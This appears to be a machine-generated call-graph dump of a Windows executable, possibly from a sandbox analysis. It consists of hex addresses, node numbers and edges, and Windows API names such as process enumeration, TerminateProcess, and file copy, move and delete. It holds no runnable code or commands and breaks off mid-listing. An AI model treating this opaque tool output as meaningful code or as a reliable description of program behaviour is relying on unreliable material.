e69f63 LeaveCriticalSection _doexit 98222->98231 98225->98206 98226->98212 98228->98207 98229->98211 98230->98222 98231->98211 98232->98184 98233->98186 98234->98189 98238 e69fa5 LeaveCriticalSection 98235->98238 98237 e62eb7 98237->98175 98238->98237 98239 e7e463 98251 e4373a 98239->98251 98241 e7e479 98242 e7e48f 98241->98242 98243 e7e4fa 98241->98243 98302 e45376 60 API calls 98242->98302 98260 e4b020 98243->98260 98247 e7e4ce 98250 e7e4ee Mailbox 98247->98250 98303 ea890a 59 API calls Mailbox 98247->98303 98248 e7f046 Mailbox 98250->98248 98304 eaa48d 89 API calls 4 library calls 98250->98304 98252 e43746 98251->98252 98253 e43758 98251->98253 98305 e4523c 59 API calls 98252->98305 98254 e43787 98253->98254 98255 e4375e 98253->98255 98316 e4523c 59 API calls 98254->98316 98306 e60fe6 98255->98306 98259 e43750 98259->98241 98345 e53740 98260->98345 98263 e830b6 98454 eaa48d 89 API calls 4 library calls 98263->98454 98264 e4b07f 98264->98263 98266 e830d4 98264->98266 98283 e4bb86 98264->98283 98297 e4b132 Mailbox _memmove 98264->98297 98455 eaa48d 89 API calls 4 library calls 98266->98455 98268 e8355e 98281 e4b4dd 98268->98281 98498 eaa48d 89 API calls 4 library calls 98268->98498 98269 e8318a 98269->98281 98457 eaa48d 89 API calls 4 library calls 98269->98457 98274 e83106 98274->98269 98456 e4a9de 430 API calls 98274->98456 98277 e453b0 430 API calls 98277->98297 98278 e43b31 59 API calls 98278->98297 98279 e9730a 59 API calls 98279->98297 98281->98250 98453 eaa48d 89 API calls 4 library calls 98283->98453 98284 e83418 98464 e453b0 98284->98464 98286 e83448 98286->98281 98492 e439be 98286->98492 98291 e831c3 98458 eaa48d 89 API calls 4 library calls 98291->98458 98292 e43c30 68 API calls 98292->98297 98293 e8346f 98496 eaa48d 89 API calls 4 library calls 98293->98496 98297->98268 98297->98274 98297->98277 98297->98278 98297->98279 98297->98281 98297->98283 98297->98284 98297->98291 98297->98292 98297->98293 98298 e4523c 59 API calls 98297->98298 98299 e51c9c 59 API calls 98297->98299 98300 e60fe6 59 API calls Mailbox 98297->98300 98350 e43add 98297->98350 98357 e4bc70 98297->98357 98441 e43a40 98297->98441 98452 e45190 59 API calls Mailbox 98297->98452 98459 e96c62 59 API calls 2 library calls 98297->98459 98460 eba9c3 85 API calls Mailbox 98297->98460 98461 e96c1e 59 API calls Mailbox 98297->98461 98462 ea5ef2 68 API calls 98297->98462 98463 e43ea3 68 API calls Mailbox 98297->98463 98497 eaa12a 59 API calls 98297->98497 98298->98297 98299->98297 98300->98297 98302->98247 98303->98250 98304->98248 98305->98259 98308 e60fee 98306->98308 98309 e61008 98308->98309 98311 e6100c std::exception::exception 98308->98311 98317 e6593c 98308->98317 98334 e635d1 DecodePointer 98308->98334 98309->98259 98335 e687cb RaiseException 98311->98335 98313 e61036 98336 e68701 58 API calls _free 98313->98336 98315 e61048 98315->98259 98316->98259 98318 e659b7 98317->98318 98324 e65948 98317->98324 98343 e635d1 DecodePointer 98318->98343 98320 e659bd 98344 e68d58 58 API calls __getptd_noexit 98320->98344 98323 e6597b RtlAllocateHeap 98323->98324 98333 e659af 98323->98333 98324->98323 98326 e659a3 98324->98326 98327 e65953 98324->98327 98331 e659a1 98324->98331 98340 e635d1 DecodePointer 98324->98340 98341 e68d58 58 API calls __getptd_noexit 98326->98341 98327->98324 98337 e6a39b 58 API calls __NMSG_WRITE 98327->98337 98338 e6a3f8 58 API calls 4 library calls 98327->98338 98339 e632cf GetModuleHandleExW GetProcAddress ExitProcess ___crtCorExitProcess 98327->98339 98342 e68d58 58 API calls __getptd_noexit 98331->98342 98333->98308 98334->98308 98335->98313 98336->98315 98337->98327 98338->98327 98340->98324 98341->98331 98342->98333 98343->98320 98344->98333 98346 e5374f 98345->98346 98349 e5376a 98345->98349 98499 e51aa4 98346->98499 98348 e53757 CharUpperBuffW 98348->98349 98349->98264 98351 e7d3cd 98350->98351 98352 e43aee 98350->98352 98353 e60fe6 Mailbox 59 API calls 98352->98353 98354 e43af5 98353->98354 98355 e43b16 98354->98355 98503 e43ba5 59 API calls Mailbox 98354->98503 98355->98297 98358 e8359f 98357->98358 98369 e4bc95 98357->98369 98638 eaa48d 89 API calls 4 library calls 98358->98638 98360 e4bf3b 98360->98297 98362 e4c2b6 98362->98360 98365 e4c2c3 98362->98365 98636 e4c483 430 API calls Mailbox 98365->98636 98368 e4c2ca LockWindowUpdate DestroyWindow GetMessageW 98368->98360 98370 e4c2fc 98368->98370 98432 e4bca5 Mailbox 98369->98432 98639 e45376 60 API calls 98369->98639 98640 e9700c 430 API calls 98369->98640 98371 e84509 TranslateMessage DispatchMessageW GetMessageW 98370->98371 98371->98371 98373 e84539 98371->98373 98372 e836b3 Sleep 98372->98432 98373->98360 98375 e8405d WaitForSingleObject 98381 e8407d GetExitCodeProcess CloseHandle 98375->98381 98375->98432 98376 e4bf54 timeGetTime 98376->98432 98377 e60fe6 59 API calls Mailbox 98377->98432 98380 e4c210 Sleep 98380->98432 98388 e4c36b 98381->98388 98383 e843a9 Sleep 98412 e83895 Mailbox 98383->98412 98386 e4c324 timeGetTime 98637 e45376 60 API calls 98386->98637 98388->98297 98392 e84440 GetExitCodeProcess 98397 e8446c CloseHandle 98392->98397 98398 e84456 WaitForSingleObject 98392->98398 98393 ec6562 110 API calls 98393->98412 98395 e46d79 109 API calls 98395->98432 98397->98412 98398->98397 98398->98432 98399 e46cd8 408 API calls 98399->98432 98400 e45376 60 API calls 98400->98432 98401 e844c8 Sleep 98401->98432 98402 e838aa Sleep 98402->98432 98405 e51a36 59 API calls 98405->98412 98409 e453b0 408 API calls 98409->98432 98411 e4c26d 98631 e51a36 98411->98631 98412->98388 98412->98392 98412->98393 98412->98401 98412->98402 98412->98405 98412->98432 98668 e51207 98412->98668 98673 ea2baf 60 API calls 98412->98673 98674 e45376 60 API calls 98412->98674 98675 e43ea3 68 API calls Mailbox 98412->98675 98676 e46cd8 430 API calls 98412->98676 98717 e970e2 59 API calls 98412->98717 98718 ea57ff QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98412->98718 98719 e6083e timeGetTime 98412->98719 98720 ea4148 CreateToolhelp32Snapshot Process32FirstW 98412->98720 98413 e4b020 408 API calls 98413->98432 98417 e4bf25 Mailbox 98417->98360 98635 e4c460 10 API calls Mailbox 98417->98635 98418 eaa48d 89 API calls 98418->98432 98421 e45190 59 API calls Mailbox 98421->98432 98422 e96cf1 59 API calls Mailbox 98422->98432 98423 e43a40 59 API calls 98423->98432 98424 e439be 68 API calls 98424->98432 98425 e43ea3 68 API calls 98425->98432 98426 e83e13 VariantClear 98426->98432 98427 e83ea9 VariantClear 98427->98432 98428 e97aad 59 API calls 98428->98432 98429 e83c57 VariantClear 98429->98432 98430 e441c4 59 API calls Mailbox 98430->98432 98431 e51a36 59 API calls 98431->98432 98432->98372 98432->98375 98432->98376 98432->98377 98432->98380 98432->98383 98432->98386 98432->98388 98432->98395 98432->98399 98432->98400 98432->98409 98432->98411 98432->98412 98432->98413 98432->98417 98432->98418 98432->98421 98432->98422 98432->98423 98432->98424 98432->98425 98432->98426 98432->98427 98432->98428 98432->98429 98432->98430 98432->98431 98504 e452b0 98432->98504 98513 e49a00 98432->98513 98520 e49c80 98432->98520 98551 e4a820 98432->98551 98568 e542cf 98432->98568 98572 ea412a 98432->98572 98575 eabcd6 98432->98575 98605 ebe60c 98432->98605 98608 e4e36d 98432->98608 98617 ebf93c 98432->98617 98620 eae4a0 98432->98620 98623 eac270 98432->98623 98630 e6083e timeGetTime 98432->98630 98641 e51c9c 98432->98641 98645 ec6655 59 API calls 98432->98645 98646 eaa058 59 API calls Mailbox 98432->98646 98647 e9e0aa 59 API calls 98432->98647 98648 e44d37 98432->98648 98666 e96c62 59 API calls 2 library calls 98432->98666 98667 e438ff 59 API calls 98432->98667 98677 ebc355 98432->98677 98442 e7d3b1 98441->98442 98445 e43a53 98441->98445 98443 e7d3c1 98442->98443 99624 e96d17 59 API calls 98442->99624 98446 e43a7d 98445->98446 98451 e43a9a Mailbox 98445->98451 99615 e43b31 98445->99615 98448 e43a83 98446->98448 98449 e43b31 59 API calls 98446->98449 98448->98451 99623 e45190 59 API calls Mailbox 98448->99623 98449->98448 98451->98297 98452->98297 98453->98263 98454->98281 98455->98281 98456->98269 98457->98281 98458->98281 98459->98297 98460->98297 98461->98297 98462->98297 98463->98297 98465 e453cf 98464->98465 98487 e453fd Mailbox 98464->98487 98466 e60fe6 Mailbox 59 API calls 98465->98466 98466->98487 98467 e62f70 67 API calls __cinit 98467->98487 98468 e469ff 98472 e7f165 98468->98472 98473 e7e691 98468->98473 98469 e469fa 98470 e51c9c 59 API calls 98469->98470 98488 e45569 Mailbox 98470->98488 98471 e51207 59 API calls 98471->98487 99648 eaa48d 89 API calls 4 library calls 98472->99648 99644 eaa48d 89 API calls 4 library calls 98473->99644 98477 e60fe6 59 API calls Mailbox 98477->98487 98478 e7e6a0 98478->98286 98479 e7ea9a 98483 e51c9c 59 API calls 98479->98483 98481 e51c9c 59 API calls 98481->98487 98483->98488 98484 e7eb67 98484->98488 99645 e97aad 59 API calls 98484->99645 98485 e97aad 59 API calls 98485->98487 98487->98467 98487->98468 98487->98469 98487->98471 98487->98473 98487->98477 98487->98479 98487->98481 98487->98484 98487->98485 98487->98488 98489 e7ef28 98487->98489 98491 e45a1a 98487->98491 99626 e46e30 98487->99626 99643 e47e50 430 API calls 2 library calls 98487->99643 98488->98286 99646 eaa48d 89 API calls 4 library calls 98489->99646 99647 eaa48d 89 API calls 4 library calls 98491->99647 98493 e439c9 98492->98493 98494 e439f0 98493->98494 99654 e43ea3 68 API calls Mailbox 98493->99654 98494->98293 98496->98281 98497->98297 98498->98281 98500 e51ab7 98499->98500 98502 e51ab4 _memmove 98499->98502 98501 e60fe6 Mailbox 59 API calls 98500->98501 98501->98502 98502->98348 98503->98355 98505 e452c6 98504->98505 98507 e45313 98504->98507 98506 e452d3 PeekMessageW 98505->98506 98505->98507 98506->98507 98508 e452ec 98506->98508 98507->98508 98510 e7df68 TranslateAcceleratorW 98507->98510 98511 e45352 TranslateMessage DispatchMessageW 98507->98511 98512 e4533e PeekMessageW 98507->98512 98730 e4359e 98507->98730 98508->98432 98510->98507 98510->98512 98511->98512 98512->98507 98512->98508 98514 e49a1d 98513->98514 98516 e49a31 98513->98516 98735 e494e0 98514->98735 98769 eaa48d 89 API calls 4 library calls 98516->98769 98517 e49a28 98517->98432 98519 e82478 98519->98519 98521 e49cb5 98520->98521 98522 e8247d 98521->98522 98524 e49d1f 98521->98524 98534 e49d79 98521->98534 98523 e453b0 430 API calls 98522->98523 98525 e82492 98523->98525 98527 e51207 59 API calls 98524->98527 98524->98534 98548 e49f50 Mailbox 98525->98548 98779 eaa48d 89 API calls 4 library calls 98525->98779 98526 e51207 59 API calls 98526->98534 98529 e824d8 98527->98529 98531 e62f70 __cinit 67 API calls 98529->98531 98530 e62f70 __cinit 67 API calls 98530->98534 98531->98534 98532 e824fa 98532->98432 98533 e439be 68 API calls 98533->98548 98534->98526 98534->98530 98534->98532 98538 e49f3a 98534->98538 98534->98548 98535 e453b0 430 API calls 98535->98548 98537 e4a775 98784 eaa48d 89 API calls 4 library calls 98537->98784 98538->98548 98780 eaa48d 89 API calls 4 library calls 98538->98780 98539 eaa48d 89 API calls 98539->98548 98543 e827f9 98543->98432 98544 e44230 59 API calls 98544->98548 98548->98533 98548->98535 98548->98537 98548->98539 98548->98544 98550 e4a058 98548->98550 98778 e51bcc 59 API calls 2 library calls 98548->98778 98781 e97aad 59 API calls 98548->98781 98782 ebccac 430 API calls 98548->98782 98783 ebbc26 430 API calls Mailbox 98548->98783 98785 e45190 59 API calls Mailbox 98548->98785 98786 eb9ab0 430 API calls Mailbox 98548->98786 98550->98432 98552 e82d51 98551->98552 98555 e4a84c 98551->98555 98788 eaa48d 89 API calls 4 library calls 98552->98788 98554 e82d62 98554->98432 98556 e82d6a 98555->98556 98563 e4a888 _memmove 98555->98563 98789 eaa48d 89 API calls 4 library calls 98556->98789 98558 e60fe6 59 API calls Mailbox 98558->98563 98560 e82dae 98790 e4a9de 430 API calls 98560->98790 98561 e453b0 430 API calls 98561->98563 98563->98558 98563->98560 98563->98561 98564 e82dc8 98563->98564 98565 e4a975 98563->98565 98566 e4a962 98563->98566 98564->98565 98791 eaa48d 89 API calls 4 library calls 98564->98791 98565->98432 98566->98565 98787 eba9c3 85 API calls Mailbox 98566->98787 98569 e542d9 98568->98569 98570 e542e8 98568->98570 98569->98432 98570->98569 98571 e542ed CloseHandle 98570->98571 98571->98569 98792 ea494a GetFileAttributesW 98572->98792 98576 eabcf5 98575->98576 98602 eabdbb Mailbox 98575->98602 98796 e4502b 98576->98796 98578 e44d37 84 API calls 98580 eabdf3 98578->98580 98579 eabd00 98582 e4502b 59 API calls 98579->98582 98581 e44d37 84 API calls 98580->98581 98583 eabe05 98581->98583 98584 eabd14 98582->98584 98872 ea3ce2 98583->98872 98586 e51207 59 API calls 98584->98586 98584->98602 98587 eabd25 98586->98587 98588 e51207 59 API calls 98587->98588 98589 eabd2e 98588->98589 98590 e44d37 84 API calls 98589->98590 98591 eabd3b 98590->98591 98800 e60119 98591->98800 98593 eabd4e 98851 e517e0 98593->98851 98596 ea412a 3 API calls 98598 eabd6e 98596->98598 98597 e4502b 59 API calls 98597->98602 98599 e51a36 59 API calls 98598->98599 98604 eabd88 Mailbox 98598->98604 98600 eabd7f 98599->98600 98860 ea3f1d 98600->98860 98602->98578 98603 eabdc3 Mailbox 98602->98603 98603->98432 98604->98597 99072 ebd1c6 98605->99072 98607 ebe61c 98607->98432 98609 e4502b 59 API calls 98608->98609 98610 e4e381 98609->98610 98611 e4e385 timeGetTime 98610->98611 98612 e4e3bc Sleep 98610->98612 98613 e4502b 59 API calls 98611->98613 98614 e4e3b4 98612->98614 98615 e4e39b 98613->98615 98614->98432 98616 e4bc70 428 API calls 98615->98616 98616->98614 99182 ebfd7d 98617->99182 99290 eaf87d 98620->99290 98622 eae4b0 98622->98432 98624 e44d37 84 API calls 98623->98624 98625 eac286 98624->98625 99426 ea4005 98625->99426 98627 eac28e 98628 eac2a7 98627->98628 98629 eac292 GetLastError 98627->98629 98628->98432 98629->98628 98630->98432 98632 e51a45 __NMSG_WRITE _memmove 98631->98632 98633 e60fe6 Mailbox 59 API calls 98632->98633 98634 e51a83 98633->98634 98634->98417 98635->98362 98636->98368 98637->98432 98638->98369 98639->98369 98640->98369 98642 e51ca7 98641->98642 98643 e51caf 98641->98643 99450 e51bcc 59 API calls 2 library calls 98642->99450 98643->98432 98645->98432 98646->98432 98647->98432 98649 e44d51 98648->98649 98661 e44d4b 98648->98661 98650 e7db28 __i64tow 98649->98650 98651 e44d99 98649->98651 98653 e44d57 __itow 98649->98653 98656 e7da2f 98649->98656 99451 e638c8 83 API calls 3 library calls 98651->99451 98655 e60fe6 Mailbox 59 API calls 98653->98655 98658 e44d71 98655->98658 98657 e7daa7 Mailbox _wcscpy 98656->98657 98659 e60fe6 Mailbox 59 API calls 98656->98659 99452 e638c8 83 API calls 3 library calls 98657->99452 98660 e51a36 59 API calls 98658->98660 98658->98661 98662 e7da74 98659->98662 98660->98661 98661->98432 98663 e60fe6 Mailbox 59 API calls 98662->98663 98664 e7da9a 98663->98664 98664->98657 98665 e51a36 59 API calls 98664->98665 98665->98657 98666->98432 98667->98432 98669 e60fe6 Mailbox 59 API calls 98668->98669 98670 e51228 98669->98670 98671 e60fe6 Mailbox 59 API calls 98670->98671 98672 e51236 98671->98672 98672->98412 98673->98412 98674->98412 98675->98412 98676->98412 98678 ebc39a 98677->98678 98679 ebc380 98677->98679 99453 eba8fd 98678->99453 99480 eaa48d 89 API calls 4 library calls 98679->99480 98683 e453b0 429 API calls 98684 ebc406 98683->98684 98685 ebc498 98684->98685 98688 ebc447 98684->98688 98710 ebc392 Mailbox 98684->98710 98686 ebc4ee 98685->98686 98687 ebc49e 98685->98687 98689 e44d37 84 API calls 98686->98689 98686->98710 99481 ea7ed5 59 API calls 98687->99481 98692 ea789a 59 API calls 98688->98692 98690 ebc500 98689->98690 98693 e51aa4 59 API calls 98690->98693 98695 ebc477 98692->98695 98696 ebc524 CharUpperBuffW 98693->98696 98694 ebc4c1 99482 e535b9 59 API calls Mailbox 98694->99482 98699 e96ebc 429 API calls 98695->98699 98700 ebc53e 98696->98700 98698 ebc4c9 Mailbox 98703 e4b020 429 API calls 98698->98703 98699->98710 98701 ebc591 98700->98701 98702 ebc545 98700->98702 98704 e44d37 84 API calls 98701->98704 99460 ea789a 98702->99460 98703->98710 98705 ebc599 98704->98705 99483 e45376 60 API calls 98705->99483 98710->98432 98711 ebc5a3 98711->98710 98712 e44d37 84 API calls 98711->98712 98713 ebc5be 98712->98713 99484 e535b9 59 API calls Mailbox 98713->99484 98715 ebc5ce 98716 e4b020 429 API calls 98715->98716 98716->98710 98717->98412 98718->98412 98719->98412 99607 ea4ce2 98720->99607 98722 ea4244 CloseHandle 98722->98412 98723 ea4195 Process32NextW 98723->98722 98727 ea418e Mailbox 98723->98727 98724 e51207 59 API calls 98724->98727 98725 e51a36 59 API calls 98725->98727 98726 e60119 59 API calls 98726->98727 98727->98722 98727->98723 98727->98724 98727->98725 98727->98726 98728 e517e0 59 API calls 98727->98728 98729 e5151f 61 API calls 98727->98729 98728->98727 98729->98727 98731 e435e2 98730->98731 98734 e435b0 98730->98734 98731->98507 98732 e435d5 IsDialogMessageW 98732->98731 98732->98734 98733 e7d273 GetClassLongW 98733->98732 98733->98734 98734->98731 98734->98732 98734->98733 98736 e453b0 430 API calls 98735->98736 98737 e4951f 98736->98737 98738 e82001 98737->98738 98752 e49527 _memmove 98737->98752 98771 e45190 59 API calls Mailbox 98738->98771 98740 e822c0 98777 eaa48d 89 API calls 4 library calls 98740->98777 98742 e822de 98742->98742 98743 e49583 98743->98517 98744 e49944 98747 e60fe6 Mailbox 59 API calls 98744->98747 98745 e4986a 98748 e822b1 98745->98748 98749 e4987f 98745->98749 98746 e60fe6 59 API calls Mailbox 98746->98752 98759 e496e3 _memmove 98747->98759 98776 eba983 59 API calls 98748->98776 98751 e60fe6 Mailbox 59 API calls 98749->98751 98762 e4977d 98751->98762 98752->98740 98752->98743 98752->98744 98752->98746 98753 e496cf 98752->98753 98766 e49741 98752->98766 98753->98744 98755 e496dc 98753->98755 98754 e60fe6 Mailbox 59 API calls 98757 e4970e 98754->98757 98756 e60fe6 Mailbox 59 API calls 98755->98756 98756->98759 98757->98766 98770 e4cca0 430 API calls 98757->98770 98758 e822a0 98775 eaa48d 89 API calls 4 library calls 98758->98775 98759->98754 98759->98757 98759->98766 98762->98517 98764 e82278 98774 eaa48d 89 API calls 4 library calls 98764->98774 98766->98745 98766->98758 98766->98762 98766->98764 98767 e82253 98766->98767 98772 e48180 430 API calls 98766->98772 98773 eaa48d 89 API calls 4 library calls 98767->98773 98769->98519 98770->98766 98771->98744 98772->98766 98773->98762 98774->98762 98775->98762 98776->98740 98777->98742 98778->98548 98779->98548 98780->98548 98781->98548 98782->98548 98783->98548 98784->98543 98785->98548 98786->98548 98787->98565 98788->98554 98789->98565 98790->98564 98791->98565 98793 ea4131 98792->98793 98794 ea4965 FindFirstFileW 98792->98794 98793->98432 98794->98793 98795 ea497a FindClose 98794->98795 98795->98793 98797 e45041 98796->98797 98798 e4503c 98796->98798 98797->98579 98798->98797 98918 e637ba 59 API calls 98798->98918 98801 e51207 59 API calls 98800->98801 98802 e6012f 98801->98802 98803 e51207 59 API calls 98802->98803 98804 e60137 98803->98804 98805 e51207 59 API calls 98804->98805 98806 e6013f 98805->98806 98807 e51207 59 API calls 98806->98807 98808 e60147 98807->98808 98809 e9627d 98808->98809 98810 e6017b 98808->98810 98811 e51c9c 59 API calls 98809->98811 98812 e51462 59 API calls 98810->98812 98813 e96286 98811->98813 98814 e60189 98812->98814 98939 e519e1 98813->98939 98932 e51981 98814->98932 98817 e60193 98818 e601be 98817->98818 98819 e51462 59 API calls 98817->98819 98820 e601fe 98818->98820 98822 e601dd 98818->98822 98833 e962a6 98818->98833 98823 e601b4 98819->98823 98919 e51462 98820->98919 98936 e51609 98822->98936 98826 e51981 59 API calls 98823->98826 98824 e6020f 98828 e60221 98824->98828 98831 e51c9c 59 API calls 98824->98831 98825 e96376 98829 e51821 59 API calls 98825->98829 98826->98818 98832 e60231 98828->98832 98835 e51c9c 59 API calls 98828->98835 98846 e96333 98829->98846 98831->98828 98837 e60238 98832->98837 98838 e51c9c 59 API calls 98832->98838 98833->98825 98836 e9635f 98833->98836 98845 e962dd 98833->98845 98834 e51462 59 API calls 98834->98820 98835->98832 98836->98825 98841 e9634a 98836->98841 98839 e51c9c 59 API calls 98837->98839 98848 e6023f Mailbox 98837->98848 98838->98837 98839->98848 98840 e51609 59 API calls 98840->98846 98843 e51821 59 API calls 98841->98843 98842 e9633b 98844 e51821 59 API calls 98842->98844 98843->98846 98844->98846 98845->98842 98849 e96326 98845->98849 98846->98820 98846->98840 98952 e5153b 59 API calls 2 library calls 98846->98952 98848->98593 98943 e51821 98849->98943 98852 e517f2 98851->98852 98853 e8f401 98851->98853 98958 e51680 98852->98958 98964 e987f9 59 API calls _memmove 98853->98964 98856 e517fe 98856->98596 98856->98604 98857 e8f40b 98858 e51c9c 59 API calls 98857->98858 98859 e8f413 Mailbox 98858->98859 98965 e5133d 98860->98965 98863 ea3f66 GetLastError 98864 ea3f73 CreateDirectoryW 98863->98864 98865 ea3f81 98863->98865 98864->98865 98866 ea3f7f Mailbox 98864->98866 98865->98866 98867 e51981 59 API calls 98865->98867 98866->98604 98868 ea3fc3 98867->98868 98869 ea3f1d 59 API calls 98868->98869 98870 ea3fcc 98869->98870 98870->98866 98871 ea3fd0 CreateDirectoryW 98870->98871 98871->98866 98873 e51207 59 API calls 98872->98873 98874 ea3cff 98873->98874 98875 e51207 59 API calls 98874->98875 98876 ea3d07 98875->98876 98877 e51207 59 API calls 98876->98877 98878 ea3d0f 98877->98878 98879 e51207 59 API calls 98878->98879 98880 ea3d17 98879->98880 98969 e60284 98880->98969 98883 e60284 60 API calls 98884 ea3d2b 98883->98884 98979 ea4f82 98884->98979 98886 ea3d36 98990 ea4fec GetFileAttributesW 98886->98990 98889 ea3d53 98891 ea4fec GetFileAttributesW 98889->98891 98890 e51900 59 API calls 98890->98889 98892 ea3d5b 98891->98892 98893 ea3d68 98892->98893 98894 e51900 59 API calls 98892->98894 98895 e51207 59 API calls 98893->98895 98894->98893 98896 ea3d70 98895->98896 98897 e51207 59 API calls 98896->98897 98898 ea3d78 98897->98898 98899 e60119 59 API calls 98898->98899 98900 ea3d89 FindFirstFileW 98899->98900 98901 ea3eb4 FindClose 98900->98901 98915 ea3dac Mailbox 98900->98915 98907 ea3ebe Mailbox 98901->98907 98902 ea3e88 FindNextFileW 98902->98915 98903 e51a36 59 API calls 98903->98915 98905 e51c9c 59 API calls 98905->98915 98906 e517e0 59 API calls 98906->98915 98907->98603 98909 ea412a 3 API calls 98909->98915 98910 ea3e2a 98914 ea3e4e MoveFileW 98910->98914 98916 ea3e3e DeleteFileW 98910->98916 99053 e5151f 98910->99053 98911 ea3eab FindClose 98911->98907 98912 ea3ef7 CopyFileExW 98912->98915 98914->98915 98915->98901 98915->98902 98915->98903 98915->98905 98915->98906 98915->98909 98915->98910 98915->98911 98915->98912 98917 ea3e6b DeleteFileW 98915->98917 98992 ea4561 98915->98992 99046 e51900 98915->99046 98916->98915 98917->98915 98918->98797 98920 e51471 98919->98920 98921 e514ce 98919->98921 98920->98921 98923 e5147c 98920->98923 98922 e51981 59 API calls 98921->98922 98929 e5149f _memmove 98922->98929 98924 e51497 98923->98924 98925 e8f1de 98923->98925 98953 e51b7c 59 API calls Mailbox 98924->98953 98954 e51c7e 98925->98954 98928 e8f1e8 98930 e60fe6 Mailbox 59 API calls 98928->98930 98929->98824 98931 e8f208 98930->98931 98933 e51998 _memmove 98932->98933 98934 e5198f 98932->98934 98933->98817 98934->98933 98935 e51aa4 59 API calls 98934->98935 98935->98933 98937 e51aa4 59 API calls 98936->98937 98938 e51614 98937->98938 98938->98820 98938->98834 98940 e519ee 98939->98940 98941 e519fb 98939->98941 98940->98818 98942 e60fe6 Mailbox 59 API calls 98941->98942 98942->98940 98944 e5182d __NMSG_WRITE 98943->98944 98945 e5189a 98943->98945 98947 e51843 98944->98947 98948 e51868 98944->98948 98946 e51981 59 API calls 98945->98946 98951 e5184b _memmove 98946->98951 98957 e51b7c 59 API calls Mailbox 98947->98957 98950 e51c7e 59 API calls 98948->98950 98950->98951 98951->98846 98952->98846 98953->98929 98955 e60fe6 Mailbox 59 API calls 98954->98955 98956 e51c88 98955->98956 98956->98928 98957->98951 98959 e51692 98958->98959 98962 e516ba _memmove 98958->98962 98960 e60fe6 Mailbox 59 API calls 98959->98960 98959->98962 98961 e5176f _memmove 98960->98961 98963 e60fe6 Mailbox 59 API calls 98961->98963 98962->98856 98963->98961 98964->98857 98966 e5134b 98965->98966 98967 e51981 59 API calls 98966->98967 98968 e5135b GetFileAttributesW 98967->98968 98968->98863 98968->98866 99056 e71b70 98969->99056 98972 e602b0 98974 e51821 59 API calls 98972->98974 98973 e602cd 98975 e519e1 59 API calls 98973->98975 98976 e602bc 98974->98976 98975->98976 98977 e5133d 59 API calls 98976->98977 98978 e602c8 98977->98978 98978->98883 98980 e51207 59 API calls 98979->98980 98981 ea4f97 98980->98981 98982 e51207 59 API calls 98981->98982 98983 ea4f9f 98982->98983 98984 e60119 59 API calls 98983->98984 98985 ea4fae 98984->98985 98986 e60119 59 API calls 98985->98986 98987 ea4fbe 98986->98987 98988 e5151f 61 API calls 98987->98988 98989 ea4fce Mailbox 98988->98989 98989->98886 98991 ea3d41 98990->98991 98991->98889 98991->98890 98993 ea457d 98992->98993 98994 ea4582 98993->98994 98995 ea4590 98993->98995 98996 e51c9c 59 API calls 98994->98996 98997 e51207 59 API calls 98995->98997 98998 ea458b Mailbox 98996->98998 98999 ea4598 98997->98999 98998->98915 99000 e51207 59 API calls 98999->99000 99001 ea45a0 99000->99001 99002 e51207 59 API calls 99001->99002 99003 ea45ab 99002->99003 99004 e51207 59 API calls 99003->99004 99005 ea45b3 99004->99005 99006 e51207 59 API calls 99005->99006 99007 ea45bb 99006->99007 99008 e51207 59 API calls 99007->99008 99009 ea45c3 99008->99009 99010 e51207 59 API calls 99009->99010 99011 ea45cb 99010->99011 99012 e51207 59 API calls 99011->99012 99013 ea45d3 99012->99013 99014 e60119 59 API calls 99013->99014 99015 ea45ea 99014->99015 99016 e60119 59 API calls 99015->99016 99017 ea4603 99016->99017 99018 e51609 59 API calls 99017->99018 99019 ea460f 99018->99019 99020 ea4622 99019->99020 99021 e51981 59 API calls 99019->99021 99022 e51609 59 API calls 99020->99022 99021->99020 99023 ea462b 99022->99023 99024 ea463b 99023->99024 99025 e51981 59 API calls 99023->99025 99026 e51c9c 59 API calls 99024->99026 99025->99024 99027 ea4647 99026->99027 99028 e517e0 59 API calls 99027->99028 99029 ea4653 99028->99029 99058 ea4713 59 API calls 99029->99058 99031 ea4662 99059 ea4713 59 API calls 99031->99059 99033 ea4675 99034 e51609 59 API calls 99033->99034 99035 ea467f 99034->99035 99036 ea4696 99035->99036 99037 ea4684 99035->99037 99038 e51609 59 API calls 99036->99038 99039 e51900 59 API calls 99037->99039 99040 ea469f 99038->99040 99041 ea4691 99039->99041 99042 ea46bd 99040->99042 99043 e51900 59 API calls 99040->99043 99044 e517e0 59 API calls 99041->99044 99045 e517e0 59 API calls 99042->99045 99043->99041 99044->99042 99045->98998 99047 e51914 99046->99047 99048 e8f534 99046->99048 99060 e518a5 99047->99060 99050 e51c7e 59 API calls 99048->99050 99052 e8f53f __NMSG_WRITE _memmove 99050->99052 99051 e5191f 99051->98915 99065 e514db 99053->99065 99057 e60291 GetFullPathNameW 99056->99057 99057->98972 99057->98973 99058->99031 99059->99033 99061 e518b4 __NMSG_WRITE 99060->99061 99062 e518c5 _memmove 99061->99062 99063 e51c7e 59 API calls 99061->99063 99062->99051 99064 e8f4f1 _memmove 99063->99064 99066 e514e9 CompareStringW 99065->99066 99071 e8f210 99065->99071 99068 e5150c 99066->99068 99068->98910 99069 e64eb8 60 API calls 99069->99071 99070 e8f25f 99071->99069 99071->99070 99073 e44d37 84 API calls 99072->99073 99074 ebd203 99073->99074 99097 ebd24a Mailbox 99074->99097 99110 ebde8e 99074->99110 99076 ebd4a2 99077 ebd617 99076->99077 99081 ebd4b0 99076->99081 99161 ebdfb1 92 API calls Mailbox 99077->99161 99080 ebd626 99080->99081 99083 ebd632 99080->99083 99123 ebd057 99081->99123 99082 e44d37 84 API calls 99098 ebd29b Mailbox 99082->99098 99083->99097 99088 ebd4e9 99138 e60e38 99088->99138 99091 ebd51c 99146 e447be 99091->99146 99092 ebd503 99145 eaa48d 89 API calls 4 library calls 99092->99145 99095 ebd50e GetCurrentProcess TerminateProcess 99095->99091 99097->98607 99098->99076 99098->99082 99098->99097 99143 eafc0d 59 API calls 2 library calls 99098->99143 99144 ebd6c8 61 API calls 2 library calls 99098->99144 99102 ebd554 99158 ebdd32 107 API calls _free 99102->99158 99103 ebd68d 99103->99097 99106 ebd6a1 FreeLibrary 99103->99106 99106->99097 99109 ebd565 99109->99103 99159 e44230 59 API calls Mailbox 99109->99159 99160 e4523c 59 API calls 99109->99160 99162 ebdd32 107 API calls _free 99109->99162 99111 e51aa4 59 API calls 99110->99111 99112 ebdea9 CharLowerBuffW 99111->99112 99163 e9f903 99112->99163 99116 e51207 59 API calls 99117 ebdee2 99116->99117 99118 e51462 59 API calls 99117->99118 99119 ebdef9 